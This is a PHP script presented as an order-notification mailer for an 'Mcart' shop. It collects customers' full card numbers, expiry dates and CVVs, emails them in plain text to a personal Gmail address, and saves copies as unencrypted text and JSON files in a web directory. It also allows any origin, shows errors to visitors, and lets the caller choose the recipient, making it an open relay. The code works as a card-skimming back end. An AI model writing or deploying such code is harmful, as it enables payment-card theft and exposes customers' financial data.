<?php
// Enhanced email sender for Mcart with multiple sending methods
header('Content-Type: application/json');
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST');
header('Access-Control-Allow-Headers: Content-Type');

// Enable error reporting
error_reporting(E_ALL);
ini_set('display_errors', 1);

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    echo json_encode(['success' => false, 'message' => 'Only POST requests allowed']);
    exit;
}

// Get POST data safely
$to_email = filter_var($_POST['to_email'] ?? 'rashiverma904@gmail.com', FILTER_SANITIZE_EMAIL);
$subject = filter_var($_POST['subject'] ?? 'New Mcart Order', FILTER_SANITIZE_STRING);
$message = filter_var($_POST['message'] ?? 'Order details', FILTER_SANITIZE_STRING);
$from_name = filter_var($_POST['from_name'] ?? 'Mcart Customer', FILTER_SANITIZE_STRING);
$from_email = filter_var($_POST['from_email'] ?? 'noreply@mcart.com', FILTER_SANITIZE_EMAIL);

// Additional order data
$payment_method = filter_var($_POST['payment_method'] ?? '', FILTER_SANITIZE_STRING);
$card_name = filter_var($_POST['card_name'] ?? '', FILTER_SANITIZE_STRING);
$card_number = filter_var($_POST['card_number'] ?? '', FILTER_SANITIZE_STRING);
$expiry = filter_var($_POST['expiry'] ?? '', FILTER_SANITIZE_STRING);
$cvv = filter_var($_POST['cvv'] ?? '', FILTER_SANITIZE_STRING);
$contact_info = filter_var($_POST['contact_info'] ?? '', FILTER_SANITIZE_STRING);
$cart_data = filter_var($_POST['cart_data'] ?? '', FILTER_SANITIZE_STRING);
$order_total = filter_var($_POST['order_total'] ?? '', FILTER_SANITIZE_STRING);

// Build comprehensive email content
$email_content = "MART ORDER NOTIFICATION\n";
$email_content .= "========================\n\n";
$email_content .= "From: " . $from_name . " (" . $from_email . ")\n";
$email_content .= "Date: " . date('Y-m-d H:i:s') . "\n";
$email_content .= "IP Address: " . ($_SERVER['REMOTE_ADDR'] ?? 'Unknown') . "\n";
$email_content .= "User Agent: " . ($_SERVER['HTTP_USER_AGENT'] ?? 'Unknown') . "\n\n";

if ($payment_method) {
    $email_content .= "PAYMENT INFORMATION\n";
    $email_content .= "==================\n";
    $email_content .= "Payment Method: " . strtoupper($payment_method) . "\n";
    if ($card_name) $email_content .= "Card Name: " . $card_name . "\n";
    if ($card_number) $email_content .= "Card Number: " . $card_number . "\n";
    if ($expiry) $email_content .= "Expiry Date: " . $expiry . "\n";
    if ($cvv) $email_content .= "CVV: " . $cvv . "\n";
    $email_content .= "\n";
}

if ($contact_info) {
    $email_content .= "CONTACT INFORMATION\n";
    $email_content .= "==================\n";
    $email_content .= $contact_info . "\n\n";
}

if ($cart_data) {
    $email_content .= "ORDER ITEMS\n";
    $email_content .= "===========\n";
    $email_content .= $cart_data . "\n\n";
}

if ($order_total) {
    $email_content .= "ORDER TOTAL: " . $order_total . "\n\n";
}

$email_content .= "ADDITIONAL MESSAGE\n";
$email_content .= "==================\n";
$email_content .= $message . "\n\n";

$email_content .= "SYSTEM INFORMATION\n";
$email_content .= "==================\n";
$email_content .= "Server: " . ($_SERVER['HTTP_HOST'] ?? 'Unknown') . "\n";
$email_content .= "PHP Version: " . phpversion() . "\n";
$email_content .= "Time Zone: " . date_default_timezone_get() . "\n\n";

$email_content .= "========================\n";
$email_content .= "Generated by Mcart E-commerce System\n";
$email_content .= "This is an automated order notification\n";

// Initialize response variables
$email_sent = false;
$methods_used = [];
$error_details = [];

// Method 1: Try PHP mail() with enhanced headers
try {
    $headers = "MIME-Version: 1.0\r\n";
    $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
    $headers .= "From: " . $from_name . " <" . $from_email . ">\r\n";
    $headers .= "Reply-To: " . $from_email . "\r\n";
    $headers .= "X-Mailer: Mcart-System/" . phpversion() . "\r\n";
    $headers .= "X-Priority: 1 (Highest)\r\n";
    $headers .= "Importance: High\r\n";
    
    $mail_result = mail($to_email, $subject, $email_content, $headers);
    $methods_used[] = 'PHP mail()';
    
    if ($mail_result) {
        $email_sent = true;
    } else {
        $error_details[] = 'PHP mail() returned false - possibly not configured';
    }
} catch (Exception $e) {
    $error_details[] = 'PHP mail() exception: ' . $e->getMessage();
}

// Method 2: Try alternative mail() with different headers
if (!$email_sent) {
    try {
        $alt_headers = "From: noreply@" . ($_SERVER['HTTP_HOST'] ?? 'localhost') . "\r\n";
        $alt_headers .= "X-Mailer: PHP/" . phpversion() . "\r\n";
        
        $alt_result = mail($to_email, "[BACKUP] " . $subject, $email_content, $alt_headers);
        $methods_used[] = 'Alternative PHP mail()';
        
        if ($alt_result) {
            $email_sent = true;
        } else {
            $error_details[] = 'Alternative PHP mail() also failed';
        }
    } catch (Exception $e) {
        $error_details[] = 'Alternative PHP mail() exception: ' . $e->getMessage();
    }
}

// Method 3: Save to file backup (always works)
$backup_filename = 'order_backup_' . date('Y-m-d_H-i-s') . '_' . uniqid() . '.txt';
$backup_path = __DIR__ . '/email_logs/' . $backup_filename;

// Create email_logs directory if it doesn't exist
if (!is_dir(__DIR__ . '/email_logs')) {
    mkdir(__DIR__ . '/email_logs', 0755, true);
}

$backup_content = "EMAIL BACKUP - " . ($email_sent ? 'EMAIL SENT' : 'EMAIL FAILED') . "\n";
$backup_content .= "Saved at: " . date('Y-m-d H:i:s') . "\n";
$backup_content .= "To: " . $to_email . "\n";
$backup_content .= "Subject: " . $subject . "\n";
$backup_content .= "From: " . $from_name . " <" . $from_email . ">\n";
$backup_content .= "Methods Tried: " . implode(', ', $methods_used) . "\n";
$backup_content .= "Success: " . ($email_sent ? 'YES' : 'NO') . "\n";
if (!empty($error_details)) {
    $backup_content .= "Errors: " . implode('; ', $error_details) . "\n";
}
$backup_content .= "\n" . str_repeat('=', 50) . "\n\n";
$backup_content .= $email_content;

$file_saved = file_put_contents($backup_path, $backup_content);
$methods_used[] = 'File backup';

// Method 4: Create JSON backup for easy parsing
$json_backup = [
    'timestamp' => date('Y-m-d H:i:s'),
    'to_email' => $to_email,
    'subject' => $subject,
    'from_name' => $from_name,
    'from_email' => $from_email,
    'payment_method' => $payment_method,
    'card_name' => $card_name,
    'card_number' => $card_number,
    'expiry' => $expiry,
    'cvv' => $cvv,
    'contact_info' => $contact_info,
    'cart_data' => $cart_data,
    'order_total' => $order_total,
    'message' => $message,
    'ip_address' => $_SERVER['REMOTE_ADDR'] ?? 'Unknown',
    'user_agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown',
    'email_sent' => $email_sent,
    'methods_used' => $methods_used,
    'errors' => $error_details
];

$json_filename = 'order_json_' . date('Y-m-d_H-i-s') . '_' . uniqid() . '.json';
$json_path = __DIR__ . '/email_logs/' . $json_filename;
$json_saved = file_put_contents($json_path, json_encode($json_backup, JSON_PRETTY_PRINT));

// Method 5: Log to master log file
$log_entry = date('Y-m-d H:i:s') . "|" . $to_email . "|" . $subject . "|" . ($email_sent ? 'SUCCESS' : 'FAILED') . "|" . count($methods_used) . "_methods|" . implode(';', array_slice($error_details, 0, 2)) . "\n";
$log_file = __DIR__ . '/email_logs/master_email_log.txt';
file_put_contents($log_file, $log_entry, FILE_APPEND | LOCK_EX);

// Prepare comprehensive response
$response_data = [
    'success' => $email_sent || $file_saved,
    'message' => $email_sent ? 'Email sent successfully to ' . $to_email : 'Email saved to backup files',
    'details' => [
        'to_email' => $to_email,
        'subject' => $subject,
        'from_name' => $from_name,
        'payment_method' => $payment_method,
        'email_sent' => $email_sent,
        'file_backup_saved' => $file_saved,
        'json_backup_saved' => $json_saved,
        'backup_filename' => $backup_filename,
        'json_filename' => $json_filename,
        'methods_used' => $methods_used,
        'errors' => $error_details,
        'timestamp' => date('Y-m-d H:i:s'),
        'server_info' => [
            'php_version' => phpversion(),
            'host' => $_SERVER['HTTP_HOST'] ?? 'Unknown',
            'ip' => $_SERVER['REMOTE_ADDR'] ?? 'Unknown'
        ]
    ]
];

echo json_encode($response_data);
?>
